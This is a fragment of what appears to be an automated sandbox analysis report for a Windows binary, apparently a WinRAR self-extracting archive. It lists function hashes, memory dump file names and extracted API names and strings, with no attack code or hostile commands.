      • Instruction ID: 8482f341ea93038f6dab761f51189823383f8e480ba38acb57e7c919469e481c
      • Opcode Fuzzy Hash: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
      • Instruction Fuzzy Hash: 64C1BDB7B281A08FE351CF7AE400A9D7BB1F39878CB519125DF59A3B09D639E605CB40
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
      • Instruction ID: 4d715f4b4d6ac76e4a216da08f034935de751abb7778be05e3e7cca243c311ba
      • Opcode Fuzzy Hash: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
      • Instruction Fuzzy Hash: D2A1357AA0C1A2C6EB17FA24D4047B9A791FF90785F954335DA4917786CEBCE881C320
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
      • Instruction ID: ce58f501badb3e273786acfe192b6c4f51c473976b946964fffd14228fea3ec1
      • Opcode Fuzzy Hash: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
      • Instruction Fuzzy Hash: A0C1F577A292F08DE302CBB5A4248FD3FB1F71E34DB464152EF9656B4AD6285201DB70
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: AddressProc
      • String ID:
      • API String ID: 190572456-0
      • Opcode ID: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
      • Instruction ID: 4082b3cca96a344bf198d53d8c4dc1ba7e17b7010af4ff114b4a31ad2fd2e868
      • Opcode Fuzzy Hash: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
      • Instruction Fuzzy Hash: 91912F66B1C5A196EB12FF29D8402FDA720FF96789F841031EF4E07649EE78E646C310
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
      • Instruction ID: f031ca2bc1a7177a8ea7c498ce06e315eccfea47d416fc1c3df05a32dc850ea2
      • Opcode Fuzzy Hash: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
      • Instruction Fuzzy Hash: 6C612527B0C1E189EB02FF7585104FDBFA1B7497C5B8A8032DE9A53646CABCE505CB24
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
      • Instruction ID: 622d500b3a95cfe02c45c2f330e062d76c78348d5c6134331527b2ba440e98f0
      • Opcode Fuzzy Hash: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
      • Instruction Fuzzy Hash: 42512173A1C1628BE72AFF28D5047BDB751FB84B49F844230DA494768ADE7DE541CB10
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
      • Instruction ID: 8b4322e2ecc4b702c576b1ad00e4f7dd1ebeaf1999329f9032b44ce789001c0a
      • Opcode Fuzzy Hash: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
      • Instruction Fuzzy Hash: DB31F5B2A1C5928BD709FE16D69027EBBD1FB44381F448239DB4A83B42DEBCE045C710
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
      • Instruction ID: a2c4f69d78f72b03a4780760d95daba72986c00bc20fb3010c655cbe69359f48
      • Opcode Fuzzy Hash: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
      • Instruction Fuzzy Hash: E7F0447571C3A5DBDBA5BF29A442A297790F708385FC48039EA8983A44D67C94608F14
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
      • Instruction ID: 01bb027abb62f4fb24b0284bb0775104213469ba3e081cbd19a69ea658fb4030
      • Opcode Fuzzy Hash: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
      • Instruction Fuzzy Hash: 4AA0026994CC63D0E756BB14EE604B0A330FB51302BD40031F02D411B4EFBCB402C320
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
      • API String ID: 3668304517-727060406
      • Opcode ID: 036f0b4177b3bd4acf8be137eac01bdc749329f6e627dd372102b0288b9b6631
      • Instruction ID: 48d90e65904104a96cf571714183d241c5eda5595f12964e68ed5faa3d2f52f2
      • Opcode Fuzzy Hash: 036f0b4177b3bd4acf8be137eac01bdc749329f6e627dd372102b0288b9b6631
      • Instruction Fuzzy Hash: DF41083AB59B22D8EB02BB65E8403E873A5FB08799F840136DA5C03769EFB8D155C350
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
      • API String ID: 2565136772-3242537097
      • Opcode ID: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
      • Instruction ID: ba55dfebb91cd4515abba8f3d94ff7971f15d85d931703c9af7dd094cec8548a
      • Opcode Fuzzy Hash: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
      • Instruction Fuzzy Hash: 50211D6CF4DA27D2FB57BB65EC54574A3A0BF54782FC80034C91E026A1EFBCA44AC220
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
      • String ID: DXGIDebug.dll$UNC$\\?\
      • API String ID: 4097890229-4048004291
      • Opcode ID: caeda946b173b290eeb0eea351584ffd7bcd35d17f0c3fb79cdbd079912c01be
      • Instruction ID: 6694ccb95f6c8f14326471d2614de6bb1d6b31550672d86493cbbea6072ba9c5
      • Opcode Fuzzy Hash: caeda946b173b290eeb0eea351584ffd7bcd35d17f0c3fb79cdbd079912c01be
      • Instruction Fuzzy Hash: DC12CD2AB1CA52C0EB11FB64D4400ADA372FB86BD9F904131DA6D07AE9DFBDD585C350
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
      • String ID: GETPASSWORD1$Software\WinRAR SFX
      • API String ID: 431506467-1315819833
      • Opcode ID: 100daac0e34165666268f43f408bc6971489d972bf40231fa28c726ba550acfe
      • Instruction ID: 513089bf2e50cfa10c450e6cdaa147d44d78cc8634dec57ceeb3fc2a55d94676
      • Opcode Fuzzy Hash: 100daac0e34165666268f43f408bc6971489d972bf40231fa28c726ba550acfe
      • Instruction Fuzzy Hash: EAB1CD66F1D762C5FF02FB64D4442BCA362BB85795F804235DA2D26AD9EFBCA045C310
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
      • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
      • API String ID: 2868844859-1533471033
      • Opcode ID: 31d7dc5894d1c9fa85229d9e77b41a308ef747ae09a8312bf4b27f03762016a6
      • Instruction ID: 04c0b9af6db7276583f8d38043cf438206c18957172d638c8348d693a7cb24d6
      • Opcode Fuzzy Hash: 31d7dc5894d1c9fa85229d9e77b41a308ef747ae09a8312bf4b27f03762016a6
      • Instruction Fuzzy Hash: 1981A066F1C612C5EB02FBA5D8402FCA372BB49785F844235DE1D16ADAEFB8D546C320
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
      • API String ID: 3215553584-2617248754
      • Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
      • Instruction ID: 796a290d27aec585068f63c67c8af1ee031d585dba9cf211609cff2d56d21b2b
      • Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
      • Instruction Fuzzy Hash: 7A41BE3AB09B55C9E702FB25E8417A977A4FB14398F84413AEE5C03B54EF78D025C354
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Window$MessageObjectSend$ClassDeleteLongName
      • String ID: STATIC
      • API String ID: 2845197485-1882779555
      • Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
      • Instruction ID: 60c80f65225f214c20766c425eadda427d0840a8cddd6da106815c707cae195e
      • Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
      • Instruction Fuzzy Hash: 0031C439B0C662C6FB62FB11A5547B9A391BF88B82FC10130DD4D07B56DEBCE4028760
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ItemTextWindow
      • String ID: LICENSEDLG
      • API String ID: 2478532303-2177901306
      • Opcode ID: e29db3841e3cac596c2aa5df9f59b5580221106af80a371471668d29e16b4ce4
      • Instruction ID: 8ddf5ecb4e1773df20e95d725242809e16f1f7ca75cb04de13f4adace261babf
      • Opcode Fuzzy Hash: e29db3841e3cac596c2aa5df9f59b5580221106af80a371471668d29e16b4ce4
      • Instruction Fuzzy Hash: 3C419D29F0C622C2FB56FB11A814779A3A1BB84B82FC44134DD0E03B91CFBDE5868324
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: AddressProc$CurrentDirectoryProcessSystem
      • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
      • API String ID: 2915667086-2207617598
      • Opcode ID: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
      • Instruction ID: 94ef7f34be6a11e964a79c54a3b2c02fb3303b86220fb14806c57ef65884b81b
      • Opcode Fuzzy Hash: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
      • Instruction Fuzzy Hash: D1314928E0DA27D0EB16BB12A860575A7A1BF45B93FC94135CE5E033A4DEBCE5418328
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: AllocClearCreateInstanceStringVariant
      • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
      • API String ID: 462963442-3505469590
      • Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
      • Instruction ID: 257dc024a73ac37c34a36b8ca3af980b44f8f33c47491d5c855d7f651754c272
      • Opcode Fuzzy Hash: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
      • Instruction Fuzzy Hash: B8714C3AA18A26C5EB11FF25D8805ADB7B0FF84B99B845136EA4D43B68CF78D545C310
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
      • String ID: csm$csm$csm
      • API String ID: 2940173790-393685449
      • Opcode ID: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
      • Instruction ID: 24a73eea9c3a6b5edea2e916715efefc4456499e4533817d208a8596739d3aa3
      • Opcode Fuzzy Hash: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
      • Instruction Fuzzy Hash: 36E1B176A0C7A2CAE716BB24D8803AEB7A0FF45749F940235EA8D47755EF78E481C710
      APIs
      • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF741EC74F3,?,?,?,00007FF741EC525E,?,?,?,00007FF741EC5219), ref: 00007FF741EC7371
